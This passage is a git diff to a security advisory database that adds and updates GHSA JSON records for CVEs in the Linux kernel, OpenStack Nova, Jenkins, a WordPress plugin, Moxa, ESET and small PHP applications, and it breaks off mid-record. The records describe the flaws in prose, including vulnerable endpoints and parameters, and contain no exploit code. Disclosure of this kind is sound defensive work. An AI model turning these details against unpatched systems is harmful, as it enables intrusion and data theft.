b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jggw-c47g-3w3q", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2026-0714" ], "details": "A physical attack vulnerability exists in certain Moxa industrial computers using TPM-backed LUKS full-disk encryption on Moxa Industrial Linux 3, where the discrete TPM is connected to the CPU via an SPI bus. Exploitation requires invasive physical access, including opening the device and attaching external equipment to the SPI bus to capture TPM communications. If successful, the captured data may allow offline decryption of eMMC contents. This attack cannot be performed through brief or opportunistic physical access and requires extended physical access, possession of the device, appropriate equipment, and sufficient time for signal capture and analysis. Remote exploitation is not possible.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json new file mode 100644 index 0000000000000..73ff26837c6b7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jp99-8xc8-367m", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23221" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: fsl-mc: fix use-after-free in driver_override_show()\n\nThe driver_override_show() function reads the driver_override string\nwithout holding the device_lock. However, driver_override_store() uses\ndriver_set_override(), which modifies and frees the string while holding\nthe device_lock.\n\nThis can result in a concurrent use-after-free if the string is freed\nby the store function while being read by the show function.\n\nFix this by holding the device_lock around the read operation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23221" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1d6bd6183e723a7b256ff34bbb5b498b5f4f2ec0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a2ae33e1c6361e960a4d00f7cf75d880b54f9528" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json new file mode 100644 index 0000000000000..029b80444b10b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m34c-wrf8-mw69", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71237" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: Fix potential block overflow that cause system hang\n\nWhen a user executes the FITRIM command, an underflow can occur when\ncalculating nblocks if end_block is too small. Since nblocks is of\ntype sector_t, which is u64, a negative nblocks value will become a\nvery large positive integer. This ultimately leads to the block layer\nfunction __blkdev_issue_discard() taking an excessively long time to\nprocess the bio chain, and the ns_segctor_sem lock remains held for a\nlong period. This prevents other tasks from acquiring the ns_segctor_sem\nlock, resulting in the hang reported by syzbot in [1].\n\nIf the ending block is too small, typically if it is smaller than 4KiB\nrange, depending on the usage of the segment 0, it may be possible to\nattempt a discard request beyond the device size causing the hang.\n\nExiting successfully and assign the discarded size (0 in this case)\nto range->len.\n\nAlthough the start and len values in the user input range are too small,\na conservative strategy is adopted here to safely ignore them, which is\nequivalent to a no-op; it will not perform any trimming and will not\nthrow an error.\n\n[1]\ntask:segctord state:D stack:28968 pid:6093 tgid:6093 ppid:2 task_flags:0x200040 flags:0x00080000\nCall Trace:\n rwbase_write_lock+0x3dd/0x750 kernel/locking/rwbase_rt.c:272\n nilfs_transaction_lock+0x253/0x4c0 fs/nilfs2/segment.c:357\n nilfs_segctor_thread_construct fs/nilfs2/segment.c:2569 [inline]\n nilfs_segctor_thread+0x6ec/0xe00 fs/nilfs2/segment.c:2684\n\n[ryusuke: corrected part of the commit message about the consequences]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71237" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4aa45f841413cca81882602b4042c53502f34cad" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8c5ee234bd54f1447c846101fdaef2cf70c2149" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/df1e20796c9f3d541cca47fb72e4369ea135642d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ea2278657ad0d62596589fbe2caf995e189e65e7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json new file mode 100644 index 0000000000000..f89bc387274d7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4f3-qp2w-gwh6", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-24708" + ], + "details": "An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qemu-img without a format restriction, resulting in an unsafe image resize operation that could destroy data on the host system. Only compute nodes using the Flat image backend (usually configured with use_cow_images=False) are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24708" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/nova/+bug/2137507" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2026/02/17/7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-669" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json new file mode 100644 index 0000000000000..6013449d93966 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4v3-95xp-3j5h", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70147" + ], + "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70147" + }, + { + "type": "WEB", + "url": "https://projectworlds.com/online-time-table-generator-php-mysql" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70147-OTTTG-Info-Disclosure" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json index df6640dd80d20..c454d322223a0 100644 --- a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json +++ b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mc8x-4j6m-qj3r", - "modified": "2026-02-06T15:31:02Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T15:31:02Z", "aliases": [ "CVE-2025-13818" ], "details": "Local privilege escalation vulnerability via insecure temporary batch file execution in ESET Management Agent", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json new file mode 100644 index 0000000000000..ea6059e047666 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx4x-pxgm-r77w", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71231" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode\n\nThe local variable 'i' is initialized with -EINVAL, but the for loop\nimmediately overwrites it and -EINVAL is never returned.\n\nIf no empty compression mode can be found, the function would return the\nout-of-bounds index IAA_COMP_MODES_MAX, which would cause an invalid\narray access in add_iaa_compression_mode().\n\nFix both issues by returning either a valid index or -EINVAL.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71231" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c77b33b58512708bd5603f48465f018c8b748847" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d75207465eed20bc9b0daa4a0927de9568996067" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/de16f5bca05cace238d237791ed1b6e9d22dab60" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json new file mode 100644 index 0000000000000..f43c4e522439a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p525-h9pq-233r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23225" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/mmcid: Don't assume CID is CPU owned on mode switch\n\nShinichiro reported a KASAN UAF, which is actually an out of bounds access\nin the MMCID management code.\n\n CPU0\t\t\t\t\t\tCPU1\n \t\t\t\t\t\tT1 runs in userspace\n T0: fork(T4) -> Switch to per CPU CID mode\n fixup() set MM_CID_TRANSIT on T1/CPU1\n T4 exit()\n T3 exit()\n T2 exit()\n\t\t\t\t\t\tT1 exit() switch to per task mode\n\t\t\t\t\t\t ---> Out of bounds access.\n\nAs T1 has not scheduled after T0 set the TRANSIT bit, it exits with the\nTRANSIT bit set. sched_mm_cid_remove_user() clears the TRANSIT bit in\nthe task and drops the CID, but it does not touch the per CPU storage.\nThat's functionally correct because a CID is only owned by the CPU when\nthe ONCPU bit is set, which is mutually exclusive with the TRANSIT flag.\n\nNow sched_mm_cid_exit() assumes that the CID is CPU owned because the\nprior mode was per CPU. It invokes mm_drop_cid_on_cpu() which clears the\nnot set ONCPU bit and then invokes clear_bit() with an insanely large\nbit number because TRANSIT is set (bit 29).\n\nPrevent that by actually validating that the CID is CPU owned in\nmm_drop_cid_on_cpu().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json new file mode 100644 index 0000000000000..cd62b1ccfc1e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p68h-c56f-p3v6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: split cached_fid bitfields to avoid shared-byte RMW races\n\nis_open, has_lease and on_list are stored in the same bitfield byte in\nstruct cached_fid but are updated in different code paths that may run\nconcurrently. Bitfield assignments generate byte read–modify–write\noperations (e.g. `orb $mask, addr` on x86_64), so updating one flag can\nrestore stale values of the others.\n\nA possible interleaving is:\n CPU1: load old byte (has_lease=1, on_list=1)\n CPU2: clear both flags (store 0)\n CPU1: RMW store (old | IS_OPEN) -> reintroduces cleared bits\n\nTo avoid this class of races, convert these flags to separate bool\nfields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3eaa22d688311c708b73f3c68bc6d0c8e3f0f77a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4386f6af8aaedd0c5ad6f659b40cadcc8f423828" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cfa4c37dcbcfd70866e856200ed8a2894cac578" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json index 347a03450b14b..bc18a59fea38a 100644 --- a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json +++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json @@ -45,7 +45,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json new file mode 100644 index 0000000000000..e88b5b1de3963 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3v9-r7ff-976x", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70149" + ], + "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70149" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70149-Membership-SQLi" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json index 4d5790a195744..b47498da8485d 100644 --- a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json new file mode 100644 index 0000000000000..d0fa6dd3ed933 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w35p-gjc5-2g6r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2230" + ], + "details": "The Booking Calendar plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 10.14.14 via the handle_ajax_save function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, and booking permissions granted by an Administrator, to modify other users' plugin settings, such as booking calendar display options, which can disrupt the booking calendar functionality for the targeted user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2230" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/save-user-meta/save-user-meta.php#L90" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456856" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60f7df44-22f9-4a9e-a20c-4b8628674079?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json new file mode 100644 index 0000000000000..940a4d6d2b01d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w94g-pmcx-r454", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/653f8b6a091538b084715f259900f62c2ec1c6cf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71dee092903adb496fe1f357b267d94087b679e0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7d31dde1bd8678115329e46dc8d7afb63c176b74" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json index 1ca49c2294cfa..a7b941c542df3 100644 --- a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wfhp-qgm8-5p5c", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27100" ], "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index a0236b79690b7..34a5ea5e82e9e 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-287" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json index ceb4a2d258e16..4c28aa477e6c3 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -33,7 +33,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json index 3462e4bacb012..f88adbd5be477 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json +++ b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xfjv-gcf8-3jqc", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-21626" ], "details": "Access control settings for forum post custom fields are not applied to the JSON output type, leading to an ACL violation vector an information disclosure", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json new file mode 100644 index 0000000000000..3c8a8c96cec47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-fccw-fgc4", + 